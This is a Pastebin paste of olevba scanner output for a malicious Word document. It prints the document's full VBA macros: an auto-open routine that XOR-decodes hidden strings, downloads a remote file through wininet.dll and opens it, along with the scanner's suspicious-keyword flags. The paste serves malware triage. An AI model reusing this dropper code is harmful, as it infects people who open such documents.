Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- s22c-6~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: s22c-6~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- HLOPHLOP32
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module11.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' (File name: AddNewSheet.bas)
- ' Author: SENOO, Ken
- ' LICENSE: CC0
- ' (Last update: 2015-03-10T18:38+09:00)
- Sub AddNewSheet(sheet_name)
- ' ?????????????????
- For Each ws In Worksheets
- If ws.Name = sheet_name Then
- Application.DisplayAlerts = False
- ws.Delete
- Application.DisplayAlerts = True
- End If
- Next ws
- ' ????????????
- Sheets.Add(After:=ActiveSheet).Name = sheet_name
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO UFO.frm
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/UFO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Private Const API333333 = 8162
- Private Const API33333 As String = "API33333"
- Private Const API3333 = 1
- Private Const API333 = &H4000000
- Public Function API22222(ByVal sURL As String, ByVal sFileName As String) As Boolean
- #If VBA7 And Win64 Then
- Dim API2222 As LongPtr, API3333333 As LongPtr
- #Else
- Dim API2222 As Long, API3333333 As Long
- #End If
- Dim API2 As Long
- Dim API222 As String * API333333, API33333333 As String
- Dim API22 As Integer, dData As Double
- API2222 = API22222222(API33333, API3333, vbNullString, vbNullString, 0)
- If API2222 = 0 Then
- Exit Function
- End If
- API3333333 = API222222(API2222, sURL, vbNullString, 0, API333, 0)
- If API3333333 = 0 Then
- dData = 0
- Else
- API2222222 API3333333, API222, API333333, API2
- API33333333 = API222
- Do While API2 <> 0
- API2222222 API3333333, API222, API333333, API2
- API33333333 = API33333333 + Mid(API222, 1, API2)
- Loop
- dData = Len(API33333333): API22 = FreeFile
- Open sFileName For Binary Access Write Lock Write As #API22
- Put #API22, , API33333333: Close #API22
- End If
- API222222222 API3333333
- API222222222 API2222
- API33333333 = ""
- If dData Then
- API22222 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module5.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Const X11111111 = "1E25282121630C3D3D21242E5246242223"
- Private Const X1111111 = "111D0C0120243E2E7F637863011C283528"
- Private Const X111111 = "2539393D77626229222A223F575B2863292862273E622F242363284B57"
- Private Const X11111 = "1E2E3F243D3924232A630B245F571E343E392820022F27282E39"
- Private Const X1111 = "MMMMMMMMMMMMM32"
- Sub HLOPHLOP32()
- '* NAPIDPAOJMXNH55
- Dim T111111111111111 _
- As Long
- For T111111111111111 = _
- 3 To 10
- If Not T111111111111111 = 14 _
- Then Exit For
- Next T111111111111111
- Dim X111
- Set X111 = CreateObject _
- (STOP7777777777 _
- (X1111, X11111))
- Dim X11
- Const X11ID = 2
- Dim T11111111111111 As Integer
- For T11111111111111 = 0 To 0
- If T11111111111111 = 5 Then End
- Next T11111111111111
- Set X11 = X111.GetSpecialFolder _
- (X11ID)
- Dim T1111111111111 As Integer
- For T1111111111111 = 0 To 0
- If T1111111111111 = 5 Then End
- Next T1111111111111
- X1 = X11 & STOP7777777777 _
- (X1111, X1111111)
- Dim T111111111111 As Integer
- For T111111111111 = 0 To 0
- If T111111111111 = 5 Then End
- Next T111111111111
- Set X111 = CreateObject _
- (STOP7777777777 _
- (X1111, X11111))
- Dim T11111111111 As Integer
- For T11111111111 = 0 To 0
- If T11111111111 = 5 Then End
- Next T11111111111
- If X111.FileExists _
- (X1) Then
- X111. _
- DeleteFile X1
- End If
- If API22222(STOP7777777777 _
- (X1111, X111111), X1) Then
- End If
- Set SSSS = Nothing
- If X111. _
- FileExists _
- (X1) Then
- End If
- Set SASASA = CreateObject _
- (STOP7777777777 _
- (X1111, X11111111))
- SASASA.Open X1
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module6.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As LongPtr, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As Long, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
- Dim asasas1 As Long
- Dim asasas1O As String
- Dim asasas10 As Integer
- Dim asasas101 As Integer
- For asasas1 = 1 To (Len(STOP77777777) / 2)
- asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
- asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
- asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
- Next asasas1
- STOP7777777777 = asasas1O
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement